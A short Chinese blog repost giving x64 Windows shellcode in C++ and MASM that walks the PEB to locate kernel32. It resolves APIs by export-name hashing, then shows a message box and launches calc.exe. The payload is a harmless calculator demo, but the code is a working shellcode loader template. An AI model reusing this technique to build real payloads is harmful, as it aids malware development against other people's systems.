x64 ShellCode 弹出计算器
作者:互联网
Main.cpp
extern "C" void PopCalculator();
extern "C" void _INT3();
int main()
{
_INT3();
PopCalculator();
return 0;
}
Code.asm
PopCalculator proto
_INT3 proto
; Hash:
;
; WinExec : 0x1A22F51
; LoadLibrary : 0x0C917432
; MessageBoxA : 0x1E380A6A
; GetProcAddress : 0xBBAFDF85
.code
_INT3 proc
int 3
ret
_INT3 endp
PopCalculator proc
sub rsp, 100h
;
; 获取Kernel32基址
;
mov rax, gs:[60h] ; PEB
mov rax, [rax+18h] ; Ldr
mov rax, [rax+30h] ; InInitializationOrderModuleList
_kernel32:
mov rsi, [rax+10h] ; DllBase
mov rbx, [rax+40h] ; BaseDllName
mov rax, [rax]
cmp dword ptr [rbx+0Ch], 00320033h
jnz _kernel32
;
; Call LoadLibrary
;
mov rcx, rsi
mov rdx, 0C917432h
call FindApi
mov r14, rax
mov rbx, 6C6Ch
push rbx
mov rbx, 642E323372657375h
push rbx
mov rcx, rsp
sub rsp, 18h ; 预留函数参数空间
call r14
mov rbx, rax
;
; Call MessageBoxA
;
mov rcx, rbx
mov rdx, 1E380A6Ah
call FindApi
mov r14, rax
xor r9, r9
xor r8, r8
xor rdx, rdx
xor rcx, rcx
call r14
;
; Call WinExec
;
mov rcx, rsi
mov rdx, 1A22F51h
call FindApi
mov r14, rax
xor rax, rax
push rax
mov rax, 6578652e636c6163h
push rax
mov rcx, rsp
sub rsp, 20h ; 预留函数参数空间
mov rdx, 1
call r14
;
; Call ExitThread
;
mov rcx, rsi
mov rdx, 3148865413
call FindApi
mov r14, rax
mov rax, 006461h
push rax
mov rax, 6572685474697845h
push rax
mov rcx, rsi
mov rdx, rsp
sub rsp, 20h ; 预留函数参数空间
call r14 ; GetProcAddress
mov r14, rax
add rsp, 188h
sub rsp, 18h ; 预留函数参数空间
xor rcx, rcx
call r14 ; ExitThread
ret
FindApi:
;
; rcx - DLL 基址
; rdx - 函数 Hash 值
;
sub rsp, 40h
push rsi
mov rdi, rdx
mov rbx, rcx
mov rsi, [rbx+3Ch]
mov rax, rsi
shl rax, 54
shr rax, 54
mov rsi, [rbx+rax+88h] ; rsi = Export Table RVA
shl rsi, 32
shr rsi, 32
add rsi, rbx ; rsi = the base of Export Table
push rsi
mov esi, [rsi+20h] ; esi = RVA of AddressOfNames
add rsi, rbx ; rsi = VA of AddressOfNames
xor rcx, rcx
dec ecx
find_loop:
inc ecx ; ecx = index of array
lods dword ptr [rsi]
add rax, rbx ; rax = the base of a function string
xor edx, edx
hash_loop:
cmp byte ptr [rax], 0
je isEqual
ror edx, 7
push rcx
movsx ecx, byte ptr [rax]
add edx, ecx ; edx = one of function's hashes
pop rcx
inc rax
jmp hash_loop
isEqual:
cmp edx, edi
jnz find_loop
pop rsi ; rsi = the base of Export Table
mov edx, [rsi+24h] ; edx = RVA of AddressOfNameOrdinals
add rdx, rbx ; rdx = VA of AddressOfNameOrdinals
movsx ecx, word ptr [rdx+rcx*2] ; ecx = the index of AddressOfFunctions
mov edx, [rsi+1Ch] ; edx = RVA of AddressOfFunctions
add rdx, rbx ; rdx = VA of AddressOfFunctions
mov eax, [rdx+rcx*4] ; eax = the RVA of base of function
add rax, rbx ; rax = the VA of base of function
pop rsi
add rsp, 40h
ret
PopCalculator endp
end
标签:rcx,rsi,rbx,x64,mov,rdx,计算器,ShellCode,rax 来源: https://www.cnblogs.com/SuperGreen/p/16297129.html